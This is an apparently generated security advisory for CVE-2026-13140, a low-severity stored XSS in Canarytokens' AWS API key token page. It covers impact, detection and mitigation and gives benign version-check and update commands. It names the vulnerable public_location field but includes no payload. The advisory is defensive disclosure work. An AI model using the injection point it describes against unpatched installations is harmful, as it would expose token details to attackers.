Compliance Impact

The vulnerability is a Stored Cross-Site Scripting (XSS) issue that allows execution of JavaScript within the victim's browser on the Canarytokens.org domain, limited to extracting details about the targeted AWS API Key Canarytoken.

The impact on confidentiality and integrity is limited, and there are no user sessions on Canarytokens.org, which restricts the attacker's impact.

Given the low severity and limited impact, the vulnerability poses minimal direct risk to compliance with common standards and regulations such as GDPR or HIPAA, which focus on protecting personal and sensitive data.

However, any vulnerability that could potentially expose sensitive information, such as AWS API keys, might indirectly affect compliance if exploited in a broader attack context.

Useful 0 Not Useful 0

Executive Summary

CVE-2026-13140 is a Stored Cross-Site Scripting (XSS) vulnerability found in the exposed AWS API key store of Thinkst Applied Research's Canarytokens.

The vulnerability occurs when an attacker, who must know a random unguessable identifier, injects malicious JavaScript code into the public_location field. When a user clicks on a link containing this malicious code, the script executes within the victim's browser on the Canarytokens.org domain.

Because Canarytokens.org does not maintain user sessions, the attacker's ability to cause harm is limited to extracting details about the targeted AWS API Key Canarytoken.

The vulnerability affects versions of Canarytokens with Docker tag sha-4116b92cb or earlier and Git commit 4116b92cb or earlier, and has been patched in newer versions.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can allow an attacker to execute malicious JavaScript in the browser of a user who clicks a specially crafted link containing the malicious code.

The impact is limited because the attacker needs to know a random identifier and user interaction (clicking the link) is required.

The attacker can only extract information related to the targeted AWS API Key Canarytoken, but cannot hijack user sessions or cause broader compromise on Canarytokens.org.

Overall, the vulnerability is considered low severity due to high attack complexity, limited confidentiality and integrity impact, and the need for user interaction.

Useful 0 Not Useful 0

Detection Guidance

Detection of this vulnerability involves identifying if your Canarytokens installation is running a vulnerable version, specifically Docker tag sha-4116b92cb or earlier, or Git commit 4116b92cb or earlier.

Since the vulnerability is a Stored Cross-Site Scripting (XSS) in the exposed AWS API key store, detection can include checking for the presence of malicious JavaScript in the public_location field of Canarytokens.

You can verify the version of your Canarytokens Docker image by running the command:

• docker images | grep canarytokens

To check the Git commit version if you have the source code, use:

• git log -1 --format=%H

Additionally, inspecting the stored tokens for suspicious or unexpected JavaScript in the public_location field can be done by querying the database or reviewing token configurations.

Useful 0 Not Useful 0

Mitigation Strategies

The immediate mitigation step is to update your Canarytokens installation to the latest patched version.

For self-hosted installations, this involves pulling the latest Docker image that contains the fix.

• Run: docker pull thinkst/canarytokens:latest

After updating, restart your Canarytokens service to apply the patch.

Additionally, avoid clicking on any suspicious links containing untrusted JavaScript in the public_location field to prevent exploitation.

Useful 0 Not Useful 0